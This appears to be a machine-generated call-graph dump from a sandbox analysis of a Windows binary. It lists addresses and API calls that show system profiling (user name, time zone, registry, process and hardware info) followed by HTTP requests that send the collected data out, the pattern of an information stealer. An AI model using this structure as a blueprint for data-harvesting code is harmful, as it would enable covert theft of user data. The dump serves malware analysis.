69341 2a12746 lstrcat 69344 2a1275d 69341->69344 69343 2a1278a 69342->69343 69343->68466 69345 2a12143 lstrcpy 69344->69345 69346 2a12774 69345->69346 69346->69339 69348 2a12175 lstrcpy 69347->69348 69349 2a04a81 69348->69349 70349 2a049de 69349->70349 69351 2a04a8d 69352 2a12143 lstrcpy 69351->69352 69353 2a04aa9 69352->69353 69354 2a12143 lstrcpy 69353->69354 69355 2a04ab9 69354->69355 69356 2a12143 lstrcpy 69355->69356 69357 2a04ac9 69356->69357 69358 2a12143 lstrcpy 69357->69358 69359 2a04ad9 69358->69359 69360 2a12143 lstrcpy 69359->69360 69361 2a04ae9 InternetOpenA StrCmpCA 69360->69361 69362 2a04b1d 69361->69362 69363 2a050bc InternetCloseHandle 69362->69363 69364 2a138a6 7 API calls 69362->69364 69374 2a05109 69363->69374 69365 2a04b3d 69364->69365 69366 2a12223 2 API calls 69365->69366 69367 2a04b50 69366->69367 69368 2a121e9 lstrcpy 69367->69368 69369 2a04b5b 69368->69369 69370 2a12265 3 API calls 69369->69370 69371 2a04b87 69370->69371 69372 2a121e9 lstrcpy 69371->69372 69373 2a04b92 69372->69373 69376 2a12265 3 API calls 69373->69376 69375 2a1e88c DName::DName 5 API calls 69374->69375 69377 2a0515d 69375->69377 69378 2a04bb3 69376->69378 69480 2a156ff StrCmpCA 69377->69480 69379 2a121e9 lstrcpy 69378->69379 69380 2a04bbe 69379->69380 69381 2a12223 2 API calls 69380->69381 69382 2a04be0 69381->69382 69383 2a121e9 lstrcpy 69382->69383 69384 2a04beb 69383->69384 69385 2a12265 3 API calls 69384->69385 69386 2a04c0c 69385->69386 69387 2a121e9 lstrcpy 69386->69387 69388 2a04c17 69387->69388 69389 2a12265 3 API calls 69388->69389 69390 2a04c38 69389->69390 69391 2a121e9 lstrcpy 69390->69391 69392 2a04c43 69391->69392 69393 2a12265 3 API calls 69392->69393 69394 2a04c65 69393->69394 69395 2a12223 2 API calls 69394->69395 69396 2a04c70 69395->69396 69397 2a121e9 lstrcpy 69396->69397 69398 2a04c7b 69397->69398 69399 2a04c91 InternetConnectA 69398->69399 69399->69363 69400 2a04cbf HttpOpenRequestA 69399->69400 69401 2a050b0 InternetCloseHandle 69400->69401 69402 2a04cff 69400->69402 69401->69363 69403 2a04d23 69402->69403 69404 2a04d07 InternetSetOptionA 69402->69404 69405 2a12265 3 API calls 69403->69405 69404->69403 69406 2a04d39 69405->69406 69407 2a121e9 lstrcpy 69406->69407 69408 2a04d44 69407->69408 69409 2a12223 2 API calls 69408->69409 69410 2a04d66 69409->69410 69411 2a121e9 lstrcpy 69410->69411 69412 2a04d71 69411->69412 69413 2a12265 3 API calls 69412->69413 69414 2a04d92 69413->69414 69415 2a121e9 lstrcpy 69414->69415 69416 2a04d9d 69415->69416 69417 2a12265 3 API calls 69416->69417 69418 2a04dbf 69417->69418 69419 2a121e9 lstrcpy 69418->69419 69420 2a04dca 69419->69420 69421 2a12265 3 API calls 69420->69421 69422 2a04deb 69421->69422 69423 2a121e9 lstrcpy 69422->69423 69424 2a04df6 69423->69424 69425 2a12265 3 API calls 69424->69425 69426 2a04e17 69425->69426 69427 2a121e9 lstrcpy 69426->69427 69428 2a04e22 69427->69428 69429 2a12223 2 API calls 69428->69429 69430 2a04e41 69429->69430 69431 2a121e9 lstrcpy 69430->69431 69432 2a04e4c 69431->69432 69433 2a12265 3 API calls 69432->69433 69434 2a04e6d 69433->69434 69435 2a121e9 lstrcpy 69434->69435 69436 2a04e78 69435->69436 69437 2a12265 3 API calls 69436->69437 69438 2a04e99 69437->69438 69439 2a121e9 lstrcpy 69438->69439 69440 2a04ea4 69439->69440 69441 2a12223 2 API calls 69440->69441 69442 2a04ec6 69441->69442 69443 2a121e9 lstrcpy 69442->69443 69444 2a04ed1 69443->69444 69445 2a12265 3 API calls 69444->69445 69446 2a04ef2 69445->69446 69447 2a121e9 lstrcpy 69446->69447 69448 2a04efd 69447->69448 69449 2a12265 3 API calls 69448->69449 69450 2a04f1f 69449->69450 69451 2a121e9 lstrcpy 69450->69451 69452 2a04f2a 69451->69452 69453 2a12265 3 API calls 69452->69453 69454 2a04f4b 69453->69454 69455 2a121e9 lstrcpy 69454->69455 69456 2a04f56 69455->69456 69457 2a12265 3 API calls 69456->69457 69458 2a04f77 69457->69458 69459 2a121e9 lstrcpy 69458->69459 69460 2a04f82 69459->69460 69461 2a12223 2 API calls 69460->69461 69462 2a04fa1 69461->69462 69463 2a121e9 lstrcpy 69462->69463 69464 2a04fac 69463->69464 69465 2a12143 lstrcpy 69464->69465 69466 2a04fc7 69465->69466 69467 2a12223 2 API calls 69466->69467 69468 2a04fde 69467->69468 69469 2a12223 2 API calls 69468->69469 69470 2a04fef 69469->69470 69471 2a121e9 lstrcpy 69470->69471 69472 2a04ffa 69471->69472 69473 2a05010 lstrlen lstrlen HttpSendRequestA 69472->69473 69474 2a05084 InternetReadFile 69473->69474 69475 2a0509e InternetCloseHandle 69474->69475 69478 2a05044 69474->69478 69476 2a02910 69475->69476 69476->69401 69477 2a12265 3 API calls 69477->69478 69478->69474 69478->69475 69478->69477 69479 2a121e9 lstrcpy 69478->69479 69479->69478 69481 2a15725 strtok_s 69480->69481 69482 2a1571e ExitProcess 69480->69482 69483 2a15741 69481->69483 69485 2a15885 69481->69485 69484 2a15867 strtok_s 69483->69484 69486 2a157f1 StrCmpCA 69483->69486 69487 2a15831 StrCmpCA 69483->69487 69488 2a15853 StrCmpCA 69483->69488 69489 2a157b2 StrCmpCA 69483->69489 69490 2a15796 StrCmpCA 69483->69490 69491 2a15806 StrCmpCA 69483->69491 69492 2a1581b StrCmpCA 69483->69492 69493 2a1577a StrCmpCA 69483->69493 69494 2a157dc StrCmpCA 69483->69494 69495 2a1575e StrCmpCA 69483->69495 69496 2a121a5 2 API calls 69483->69496 69484->69483 69484->69485 69485->68471 69486->69483 69486->69484 69487->69484 69488->69484 69489->69483 69489->69484 69490->69483 69490->69484 69491->69483 69491->69484 69492->69484 69493->69483 69493->69484 69494->69483 69494->69484 69495->69483 69495->69484 69496->69483 69498 2a12175 lstrcpy 69497->69498 69499 2a05e8c 69498->69499 69500 2a049de 5 API calls 69499->69500 69501 2a05e98 69500->69501 69502 2a12143 lstrcpy 69501->69502 69503 2a05eb4 69502->69503 69504 2a12143 lstrcpy 69503->69504 69505 2a05ec4 69504->69505 69506 2a12143 lstrcpy 69505->69506 69507 2a05ed4 69506->69507 69508 2a12143 lstrcpy 69507->69508 69509 2a05ee4 69508->69509 69510 2a12143 lstrcpy 69509->69510 69511 2a05ef4 InternetOpenA StrCmpCA 69510->69511 69512 2a05f28 69511->69512 69513 2a0663e InternetCloseHandle 69512->69513 69514 2a138a6 7 API calls 69512->69514 70355 2a091ff 69513->70355 69516 2a05f48 69514->69516 69518 2a12223 2 API calls 69516->69518 69517 2a0665f 69520 2a121a5 2 API calls 69517->69520 69531 2a0668b 69517->69531 69519 2a05f5b 69518->69519 69521 2a121e9 lstrcpy 69519->69521 69522 2a06671 69520->69522 69526 2a05f66 69521->69526 69523 2a12265 3 API calls 69522->69523 69524 2a06684 69523->69524 69525 2a121e9 lstrcpy 69524->69525 69525->69531 69527 2a12265 3 API calls 69526->69527 69528 2a05f92 69527->69528 69529 2a121e9 lstrcpy 69528->69529 69530 2a05f9d 69529->69530 69533 2a12265 3 API calls 69530->69533 69532 2a1e88c DName::DName 5 API calls 69531->69532 69534 2a06717 69532->69534 69535 2a05fbe 69533->69535 69665 2a1514a strtok_s 69534->69665 69536 2a121e9 lstrcpy 69535->69536 69537 2a05fc9 69536->69537 69538 2a12223 2 API calls 69537->69538 69539 2a05feb 69538->69539 69540 2a121e9 lstrcpy 69539->69540 69541 2a05ff6 69540->69541 69542 2a12265 3 API calls 69541->69542 69543 2a06017 69542->69543 69544 2a121e9 lstrcpy 69543->69544 69545 2a06022 69544->69545 69546 2a12265 3 API calls 69545->69546 69547 2a06043 69546->69547 69548 2a121e9 lstrcpy 69547->69548 69549 2a0604e 69548->69549 69550 2a12265 3 API calls 69549->69550 69551 2a06070 69550->69551 69552 2a12223 2 API calls 69551->69552 69553 2a0607b 69552->69553 69554 2a121e9 lstrcpy 69553->69554 69555 2a06086 69554->69555 69556 2a0609c InternetConnectA 69555->69556 69557 2a06638 69556->69557 69558 2a060ca HttpOpenRequestA 69556->69558 69557->69513 69559 2a0662c InternetCloseHandle 69558->69559 69560 2a0610e 69558->69560 69559->69557 69561 2a06132 69560->69561 69562 2a06116 InternetSetOptionA 69560->69562 69563 2a12265 3 API calls 69561->69563 69562->69561 69564 2a06148 69563->69564 69565 2a121e9 lstrcpy 69564->69565 69566 2a06153 69565->69566 69567 2a12223 2 API calls 69566->69567 69568 2a06175 69567->69568 69569 2a121e9 lstrcpy 69568->69569 69570 2a06180 69569->69570 69571 2a12265 3 API calls 69570->69571 69572 2a061a1 69571->69572 69573 2a121e9 lstrcpy 69572->69573 69574 2a061ac 69573->69574 69575 2a12265 3 API calls 69574->69575 69576 2a061ce 69575->69576 69577 2a121e9 lstrcpy 69576->69577 69578 2a061d9 69577->69578 69579 2a12265 3 API calls 69578->69579 69580 2a061fb 69579->69580 69581 2a121e9 lstrcpy 69580->69581 69582 2a06206 69581->69582 69583 2a12265 3 API calls 69582->69583 69584 2a06227 69583->69584 69585 2a121e9 lstrcpy 69584->69585 69586 2a06232 69585->69586 69587 2a12223 2 API calls 69586->69587 69588 2a06251 69587->69588 69589 2a121e9 lstrcpy 69588->69589 69590 2a0625c 69589->69590 69591 2a12265 3 API calls 69590->69591 69592 2a0627d 69591->69592 69593 2a121e9 lstrcpy 69592->69593 69594 2a06288 69593->69594 69595 2a12265 3 API calls 69594->69595 69596 2a062a9 69595->69596 69597 2a121e9 lstrcpy 69596->69597 69598 2a062b4 69597->69598 69599 2a12223 2 API calls 69598->69599 69600 2a062d6 69599->69600 69601 2a121e9 lstrcpy 69600->69601 69602 2a062e1 69601->69602 69603 2a12265 3 API calls 69602->69603 69604 2a06302 69603->69604 69605 2a121e9 lstrcpy 69604->69605 69606 2a0630d 69605->69606 69607 2a12265 3 API calls 69606->69607 69608 2a0632f 69607->69608 69609 2a121e9 lstrcpy 69608->69609 69610 2a0633a 69609->69610 69611 2a12265 3 API calls 69610->69611 69612 2a0635b 69611->69612 69613 2a121e9 lstrcpy 69612->69613 69614 2a06366 69613->69614 69615 2a12265 3 API calls 69614->69615 69616 2a06387 69615->69616 69617 2a121e9 lstrcpy 69616->69617 69618 2a06392 69617->69618 69619 2a12265 3 API calls 69618->69619 69620 2a063b3 69619->69620 69621 2a121e9 lstrcpy 69620->69621 69622 2a063be 69621->69622 69623 2a12265 3 API calls 69622->69623 69624 2a063df 69623->69624 69625 2a121e9 lstrcpy 69624->69625 69626 2a063ea 69625->69626 69627 2a12265 3 API calls 69626->69627 69628 2a0640b 69627->69628 69629 2a121e9 lstrcpy 69628->69629 69630 2a06416 69629->69630 69631 2a12223 2 API calls 69630->69631 69632 2a06432 69631->69632 69633 2a121e9 lstrcpy 69632->69633 69634 2a0643d 69633->69634 69635 2a12265 3 API calls 69634->69635 69636 2a0645e 69635->69636 69637 2a121e9 lstrcpy 69636->69637 69638 2a06469 69637->69638 69639 2a12265 3 API calls 69638->69639 69640 2a0648b 69639->69640 69641 2a121e9 lstrcpy 69640->69641 69642 2a06496 69641->69642 69643 2a12265 3 API calls 69642->69643 69644 2a064b7 69643->69644 69645 2a121e9 lstrcpy 69644->69645 69646 2a064c2 69645->69646 69647 2a12265 3 API calls 69646->69647 69648 2a064e3 69647->69648 69649 2a121e9 lstrcpy 69648->69649 69650 2a064ee 69649->69650 69651 2a12223 2 API calls 69650->69651 69652 2a0650d 69651->69652 69653 2a121e9 lstrcpy 69652->69653 69654 2a06518 69653->69654 69655 2a06523 lstrlen lstrlen GetProcessHeap RtlAllocateHeap lstrlen 69654->69655 70353 2a288d0 69655->70353 69658 2a288d0 _memmove 69659 2a06592 lstrlen HttpSendRequestA 69658->69659 69660 2a06601 InternetReadFile 69659->69660 69661 2a06620 InternetCloseHandle 69660->69661 69663 2a065c2 69660->69663 69661->69559 69662 2a12265 3 API calls 69662->69663 69663->69660 69663->69661 69663->69662 69664 2a121e9 lstrcpy 69663->69664 69664->69663 69666 2a151f1 69665->69666 69669 2a15176 69665->69669 69666->68479 69667 2a121a5 2 API calls 69668 2a151d7 strtok_s 69667->69668 69668->69666 69668->69669 69669->69667 69669->69668 69670 2a121a5 2 API calls 69669->69670 69670->69669 69674 2a14ed4 69671->69674 69672 2a14fd3 69672->68487 69673 2a14f80 StrCmpCA 69673->69674 69674->69672 69674->69673 69675 2a121a5 2 API calls 69674->69675 69676 2a14fb5 strtok_s 69674->69676 69677 2a14f4f StrCmpCA 69674->69677 69678 2a14f2a StrCmpCA 69674->69678 69679 2a14ef9 StrCmpCA 69674->69679 69675->69674 69676->69674 69677->69674 69678->69674 69679->69674 69681 2a15083 69680->69681 69686 2a1500b 69680->69686 69681->68495 69682 2a121a5 2 API calls 69684 2a15069 strtok_s 69682->69684 69683 2a15031 StrCmpCA 69683->69686 69684->69681 69684->69686 69685 2a121a5 2 API calls 69685->69686 69686->69682 69686->69683 69686->69684 69686->69685 69688 2a12143 lstrcpy 69687->69688 69689 2a158dc 69688->69689 69690 2a12265 3 API calls 69689->69690 69691 2a158ec 69690->69691 69692 2a121e9 lstrcpy 69691->69692 69693 2a158f4 69692->69693 69694 2a12265 3 API calls 69693->69694 69695 2a1590c 69694->69695 69696 2a121e9 lstrcpy 69695->69696 69697 2a15914 69696->69697 69698 2a12265 3 API calls 69697->69698 69699 2a1592c 69698->69699 69700 2a121e9 lstrcpy 69699->69700 69701 2a15934 69700->69701 69702 2a12265 3 API calls 69701->69702 69703 2a1594c 69702->69703 69704 2a121e9 lstrcpy 69703->69704 69705 2a15954 69704->69705 69706 2a12265 3 API calls 69705->69706 69707 2a1596c 69706->69707 69708 2a121e9 lstrcpy 69707->69708 69709 2a15974 69708->69709 70359 2a1291c GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 69709->70359 69712 2a12265 3 API calls 69713 2a1598d 69712->69713 69714 2a121e9 lstrcpy 69713->69714 69715 2a15995 69714->69715 69716 2a12265 3 API calls 69715->69716 69717 2a159ad 69716->69717 69718 2a121e9 lstrcpy 69717->69718 69719 2a159b5 69718->69719 69720 2a12265 3 API calls 69719->69720 69721 2a159cd 69720->69721 69722 2a121e9 lstrcpy 69721->69722 69723 2a159d5 69722->69723 70362 2a13230 69723->70362 69726 2a12265 3 API calls 69727 2a159ee 69726->69727 69728 2a121e9 lstrcpy 69727->69728 69729 2a159f6 69728->69729 69730 2a12265 3 API calls 69729->69730 69731 2a15a0e 69730->69731 69732 2a121e9 lstrcpy 69731->69732 69733 2a15a16 69732->69733 69734 2a12265 3 API calls 69733->69734 69735 2a15a2e 69734->69735 69736 2a121e9 lstrcpy 69735->69736 69737 2a15a36 69736->69737 69738 2a132e0 11 API calls 69737->69738 69739 2a15a46 69738->69739 69740 2a12223 2 API calls 69739->69740 69741 2a15a53 69740->69741 69742 2a121e9 lstrcpy 69741->69742 69743 2a15a5b 69742->69743 69744 2a12265 3 API calls 69743->69744 69745 2a15a7b 69744->69745 69746 2a121e9 lstrcpy 69745->69746 69747 2a15a83 69746->69747 69748 2a12265 3 API calls 69747->69748 69749 2a15a9b 69748->69749 69750 2a121e9 lstrcpy 69749->69750 69751 2a15aa3 69750->69751 69752 2a125fe 19 API calls 69751->69752 69753 2a15ab3 69752->69753 69754 2a12223 2 API calls 69753->69754 69755 2a15ac0 69754->69755 69756 2a121e9 lstrcpy 69755->69756 69757 2a15ac8 69756->69757 69758 2a12265 3 API calls 69757->69758 69759 2a15ae8 69758->69759 69760 2a121e9 lstrcpy 69759->69760 69761 2a15af0 69760->69761 69762 2a12265 3 API calls 69761->69762 69763 2a15b08 69762->69763 69764 2a121e9 lstrcpy 69763->69764 69765 2a15b10 69764->69765 69766 2a15b18 GetCurrentProcessId 69765->69766 70369 2a13ee1 OpenProcess 69766->70369 69769 2a12223 2 API calls 69770 2a15b35 69769->69770 69771 2a121e9 lstrcpy 69770->69771 69772 2a15b3d 69771->69772 69773 2a12265 3 API calls 69772->69773 69774 2a15b5d 69773->69774 69775 2a121e9 lstrcpy 69774->69775 69776 2a15b65 69775->69776 69777 2a12265 3 API calls 69776->69777 69778 2a15b7d 69777->69778 69779 2a121e9 lstrcpy 69778->69779 69780 2a15b85 69779->69780 69781 2a12265 3 API calls 69780->69781 69782 2a15b9d 69781->69782 69783 2a121e9 lstrcpy 69782->69783 69784 2a15ba5 69783->69784 69785 2a12265 3 API calls 69784->69785 69786 2a15bbd 69785->69786 69787 2a121e9 lstrcpy 69786->69787 69788 2a15bc5 69787->69788 70376 2a1278c GetProcessHeap RtlAllocateHeap 69788->70376 69791 2a12265 3 API calls 69792 2a15bde 69791->69792 69793 2a121e9 lstrcpy 69792->69793 69794 2a15be6 69793->69794 69795 2a12265 3 API calls 69794->69795 69796 2a15bfe 69795->69796 69797 2a121e9 lstrcpy 69796->69797 69798 2a15c06 69797->69798 69799 2a12265 3 API calls 69798->69799 69800 2a15c1e 69799->69800 69801 2a121e9 lstrcpy 69800->69801 69802 2a15c26 69801->69802 70383 2a13463 69802->70383 69805 2a12223 2 API calls 69806 2a15c43 69805->69806 69807 2a121e9 lstrcpy 69806->69807 69808 2a15c4b 69807->69808 69809 2a12265 3 API calls 69808->69809 69810 2a15c6b 69809->69810 69811 2a121e9 lstrcpy 69810->69811 69812 2a15c73 69811->69812 69813 2a12265 3 API calls 69812->69813 69814 2a15c8b 69813->69814 69815 2a121e9 lstrcpy 69814->69815 69816 2a15c93 69815->69816 70400 2a135f3 69816->70400 69818 2a15ca4 69819 2a12223 2 API calls 69818->69819 69820 2a15cb2 69819->69820 69821 2a121e9 lstrcpy 69820->69821 69822 2a15cba 69821->69822 69823 2a12265 3 API calls 69822->69823 69824 2a15cda 69823->69824 69825 2a121e9 lstrcpy 69824->69825 69826 2a15ce2 69825->69826 69827 2a12265 3 API calls 69826->69827 69828 2a15cfa 69827->69828 69829 2a121e9 lstrcpy 69828->69829 69830 2a15d02 69829->69830 69831 2a128e1 3 API calls 69830->69831 69832 2a15d0f 69831->69832 69833 2a12265 3 API calls 69832->69833 69834 2a15d1b 69833->69834 69835 2a121e9 lstrcpy 69834->69835 69836 2a15d23 69835->69836 69837 2a12265 3 API calls 69836->69837 69838 2a15d3b 69837->69838 69839 2a121e9 lstrcpy 69838->69839 69840 2a15d43 69839->69840 69841 2a12265 3 API calls 69840->69841 69842 2a15d5b 69841->69842 69843 2a121e9 lstrcpy 69842->69843 69844 2a15d63 69843->69844 70415 2a128af GetProcessHeap RtlAllocateHeap GetUserNameA 69844->70415 69846 2a15d70 69847 2a12265 3 API calls 69846->69847 69848 2a15d7c 69847->69848 69849 2a121e9 lstrcpy 69848->69849 69850 2a15d84 69849->69850 69851 2a12265 3 API calls 69850->69851 69852 2a15d9c 69851->69852 69853 2a121e9 lstrcpy 69852->69853 69854 2a15da4 69853->69854 69855 2a12265 3 API calls 69854->69855 69856 2a15dbc 69855->69856 69857 2a121e9 lstrcpy 69856->69857 69858 2a15dc4 69857->69858 70416 2a131bf 7 API calls 69858->70416 69861 2a12223 2 API calls 69862 2a15de3 69861->69862 69863 2a121e9 lstrcpy 69862->69863 69864 2a15deb 69863->69864 69865 2a12265 3 API calls 69864->69865 69866 2a15e0b 69865->69866 69867 2a121e9 lstrcpy 69866->69867 69868 2a15e13 69867->69868 69869 2a12265 3 API calls 69868->69869 69870 2a15e2b 69869->69870 69871 2a121e9 lstrcpy 69870->69871 69872 2a15e33 69871->69872 70419 2a12a37 69872->70419 69875 2a12223 2 API calls 69876 2a15e50 69875->69876 69877 2a121e9 lstrcpy 69876->69877 69878 2a15e58 69877->69878 69879 2a12265 3 API calls 69878->69879 69880 2a15e78 69879->69880 69881 2a121e9 lstrcpy 69880->69881 69882 2a15e80 69881->69882 69883 2a12265 3 API calls 69882->69883 69884 2a15e98 69883->69884 69885 2a121e9 lstrcpy 69884->69885 69886 2a15ea0 69885->69886 69887 2a1291c 9 API calls 69886->69887 69888 2a15ead 69887->69888 69889 2a12265 3 API calls 69888->69889 69890 2a15eb9 69889->69890 69891 2a121e9 lstrcpy 69890->69891 69892 2a15ec1 69891->69892 69893 2a12265 3 API calls 69892->69893 69894 2a15ed9 69893->69894 69895 2a121e9 lstrcpy 69894->69895 69896 2a15ee1 69895->69896 69897 2a12265 3 API calls 69896->69897 69898 2a15ef9 69897->69898 69899 2a121e9 lstrcpy 69898->69899 69900 2a15f01 69899->69900 70431 2a1298a GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 69900->70431 69903 2a12265 3 API calls 69904 2a15f1a 69903->69904 69905 2a121e9 lstrcpy 69904->69905 69906 2a15f22 69905->69906 69907 2a12265 3 API calls 69906->69907 69908 2a15f3a 69907->69908 69909 2a121e9 lstrcpy 69908->69909 69910 2a15f42 69909->69910 69911 2a12265 3 API calls 69910->69911 69912 2a15f5a 69911->69912 69913 2a121e9 lstrcpy 69912->69913 69914 2a15f62 69913->69914 69915 2a12265 3 API calls 69914->69915 69916 2a15f7a 69915->69916 69917 2a121e9 lstrcpy 69916->69917 69918 2a15f82 69917->69918 70436 2a12bad GetProcessHeap RtlAllocateHeap RegOpenKeyExA 69918->70436 69920 2a15f8f 69921 2a12265 3 API calls 69920->69921 69922 2a15f9b 69921->69922 69923 2a121e9 lstrcpy 69922->69923 69924 2a15fa3 69923->69924 69925 2a12265 3 API calls 69924->69925 69926 2a15fbb 69925->69926 69927 2a121e9 lstrcpy 69926->69927 69928 2a15fc3 69927->69928 69929 2a12265 3 API calls 69928->69929 69930 2a15fdb 69929->69930 69931 2a121e9 lstrcpy 69930->69931 69932 2a15fe3 69931->69932 70439 2a12c63 69932->70439 69935 2a12265 3 API calls 69936 2a15ffc 69935->69936 69937 2a121e9 lstrcpy 69936->69937 69938 2a16004 69937->69938 69939 2a12265 3 API calls 69938->69939 69940 2a1601c 69939->69940 69941 2a121e9 lstrcpy 69940->69941 69942 2a16024 69941->69942 69943 2a12265 3 API calls 69942->69943 69944 2a1603c 69943->69944 69945 2a121e9 lstrcpy 69944->69945 69946 2a16044 69945->69946 70454 2a12c16 GetSystemInfo wsprintfA 69946->70454 69949 2a12265 3 API calls 69950 2a1605d 69949->69950 69951 2a121e9 lstrcpy 69950->69951 69952 2a16065 69951->69952 69953 2a12265 3 API calls 69952->69953 69954 2a1607d 69953->69954 69955 2a121e9 lstrcpy 69954->69955 69956 2a16085 69955->69956 69957 2a12265 3 API calls 69956->69957 69958 2a1609d 69957->69958 69959 2a121e9 lstrcpy 69958->69959 69960 2a160a5 69959->69960 70457 2a12d75 GetProcessHeap RtlAllocateHeap 69960->70457 69963 2a12265 3 API calls 69964 2a160be 69963->69964 69965 2a121e9 lstrcpy 69964->69965 69966 2a160c6 69965->69966 69967 2a12265 3 API calls 69966->69967 69968 2a160e1 69967->69968 69969 2a121e9 lstrcpy 69968->69969 69970 2a160e9 69969->69970 69971 2a12265 3 API calls 69970->69971 69972 2a16104 69971->69972 69973 2a121e9 lstrcpy 69972->69973 69974 2a1610c 69973->69974 70464 2a12dee 69974->70464 69977 2a12223 2 API calls 69978 2a1612c 69977->69978 69979 2a121e9 lstrcpy 69978->69979 69980 2a16134 69979->69980 69981 2a12265 3 API calls 69980->69981 69982 2a16157 69981->69982 69983 2a121e9 lstrcpy 69982->69983 69984 2a1615f 69983->69984 69985 2a12265 3 API calls 69984->69985 69986 2a16177 69985->69986 69987 2a121e9 lstrcpy 69986->69987 69988 2a1617f 69987->69988 70472 2a13101 69988->70472 69991 2a12223 2 API calls 69992 2a1619f 69991->69992 69993 2a121e9 lstrcpy 69992->69993 69994 2a161a7 69993->69994 69995 2a12265 3 API calls 69994->69995 69996 2a161cd 69995->69996 69997 2a121e9 lstrcpy 69996->69997 69998 2a161d5 69997->69998 69999 2a12265 3 API calls 69998->69999 70000 2a161f0 69999->70000 70001 2a121e9 lstrcpy 70000->70001 70002 2a161f8 70001->70002 70482 2a12e5f 70002->70482 70005 2a12223 2 API calls 70006 2a1621d 70005->70006 70007 2a121e9 lstrcpy 70006->70007 70008 2a16225 70007->70008 70009 2a12e5f 21 API calls 70008->70009 70010 2a16246 70009->70010 70011 2a12223 2 API calls 70010->70011 70012 2a16255 70011->70012 70013 2a121e9 lstrcpy 70012->70013 70014 2a1625d 70013->70014 70015 2a12265 3 API calls 70014->70015 70016 2a16280 70015->70016 70017 2a121e9 lstrcpy 70016->70017 70018 2a16288 70017->70018 70019 2a01ced lstrcpy 70018->70019 70020 2a1629d lstrlen 70019->70020 70021 2a12143 lstrcpy 70020->70021 70022 2a162ba 70021->70022 70502 2a18be6 70022->70502 70024 2a162c3 70024->68499 70026 2a12175 lstrcpy 70025->70026 70027 2a05182 70026->70027 70028 2a049de 5 API calls 70027->70028 70029 2a0518e GetProcessHeap RtlAllocateHeap InternetOpenA StrCmpCA 70028->70029 70030 2a051f3 70029->70030 70031 2a05201 InternetConnectA 70030->70031 70032 2a05373 InternetCloseHandle 70030->70032 70033 2a05367 InternetCloseHandle 70031->70033 70034 2a0522d HttpOpenRequestA 70031->70034 70035 2a052c6 70032->70035 70033->70032 70036 2a0535b InternetCloseHandle 70034->70036 70037 2a0526e 70034->70037 70040 2a1e88c DName::DName 5 API calls 70035->70040 70036->70033 70038 2a05272 InternetSetOptionA 70037->70038 70039 2a0528e HttpSendRequestA HttpQueryInfoA 70037->70039 70038->70039 70039->70035 70041 2a052e3 70039->70041 70042 2a053a8 70040->70042 70041->70036 70043 2a052e9 InternetReadFile 70041->70043 70042->68506 70043->70036 70043->70041 70755 2a0902f 70044->70755 70046 2a0fef9 70046->68509 70047 2a0fcdb 70049 2a01ced lstrcpy 70047->70049 70048 2a0faf8 StrCmpCA 70050 2a0fb6f StrCmpCA 70048->70050 70066 2a0fad4 70048->70066 70051 2a0fce8 70049->70051 70052 2a0fc65 StrCmpCA 70050->70052 70050->70066 70992 2a0f182 70051->70992 70052->70066 70054 2a12143 lstrcpy 70054->70066 70059 2a12223 2 API calls 70059->70066 70060 2a12265 lstrlen lstrcpy lstrcat 70060->70066 70065 2a121e9 lstrcpy 70065->70066 70066->70046 70066->70047 70066->70048 70066->70050 70066->70052 70066->70054 70066->70059 70066->70060 70066->70065 70072 2a01ced lstrcpy 70066->70072 70077 2a12175 lstrcpy 70066->70077 70758 2a0d6c3 70066->70758 70816 2a0d8e5 70066->70816 70934 2a0e99d 70066->70934 70072->70066 70077->70066 70082 2a152c1 70081->70082 70086 2a1522c 70081->70086 70311 2a12143 lstrcpy 70310->70311 70312 2a029f5 70311->70312 70312->69316 70314 2a12143 lstrcpy 70313->70314 70315 2a02a06 70314->70315 70315->69316 70317 2a12143 lstrcpy 70316->70317 70318 2a02a17 70317->70318 70318->69316 70320 2a12175 lstrcpy 70319->70320 70321 2a18afb 70320->70321 70322 2a12175 lstrcpy 70321->70322 70323 2a18b06 70322->70323 70324 2a12175 lstrcpy 70323->70324 70325 2a18b11 70324->70325 70325->69317 70326->69316 70327->69316 70328->69316 70330 2a13309 70329->70330 70331 2a13398 70329->70331 70333 2a12143 lstrcpy 70330->70333 70332 2a12143 lstrcpy 70331->70332 70334 2a133a4 70332->70334 70335 2a1331c _memset 70333->70335 70336 2a1e88c DName::DName 5 API calls 70334->70336 70346 2a1421b lstrcpy malloc strncpy 70335->70346 70337 2a133b1 70336->70337 70337->69338 70339 2a13346 lstrcat 70347 2a02910 70339->70347 70341 2a13363 lstrcat 70342 2a13380 70341->70342 70343 2a12143 lstrcpy 70342->70343 70344 2a1338e 70343->70344 70344->70334 70345->69341 70346->70339 70348 2a02914 70347->70348 70348->70341 70350 2a049ec 70349->70350 70350->70350 70351 2a049f3 ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI lstrlen InternetCrackUrlA 70350->70351 70352 2a04a4f 70351->70352 70352->69351 70354 2a06569 lstrlen lstrlen 70353->70354 70354->69658 70356 2a0920e LocalAlloc 70355->70356 70358 2a0924a 70356->70358 70358->69517 70360 2a1e88c DName::DName 5 API calls 70359->70360 70361 2a12988 70360->70361 70361->69712 70519 2a25490 70362->70519 70365 2a132ad RegCloseKey CharToOemA 70367 2a1e88c DName::DName 5 API calls 70365->70367 70366 2a1328c RegQueryValueExA 70366->70365 70368 2a132de 70367->70368 70368->69726 70370 2a13f2b 70369->70370 70371 2a13f0f K32GetModuleFileNameExA CloseHandle 70369->70371 70372 2a12143 lstrcpy 70370->70372 70371->70370 70373 2a13f37 70372->70373 70374 2a1e88c DName::DName 5 API calls 70373->70374 70375 2a13f45 70374->70375 70375->69769 70521 2a12872 70376->70521 70379 2a127b8 70379->69791 70380 2a127bf RegOpenKeyExA 70381 2a127f7 RegCloseKey 70380->70381 70382 2a127df RegQueryValueExA 70380->70382 70381->70379 70382->70381 70528 2a30989 70383->70528 70385 2a1346f CoInitializeEx CoInitializeSecurity CoCreateInstance 70386 2a134c7 70385->70386 70387 2a134cf CoSetProxyBlanket 70386->70387 70391 2a135c0 70386->70391 70393 2a134ff 70387->70393 70388 2a12143 lstrcpy 70389 2a135eb 70388->70389 70537 2a309e5 70389->70537 70391->70388 70393->70391 70394 2a13533 VariantInit 70393->70394 70395 2a13552 70394->70395 70529 2a133b3 70395->70529 70397 2a1355d FileTimeToSystemTime GetProcessHeap RtlAllocateHeap wsprintfA 70398 2a12143 lstrcpy 70397->70398 70399 2a135b4 VariantClear 70398->70399 70399->70389 70541 2a3091d 70400->70541 70402 2a135ff CoInitializeEx CoInitializeSecurity CoCreateInstance 70403 2a13655 70402->70403 70404 2a1365d 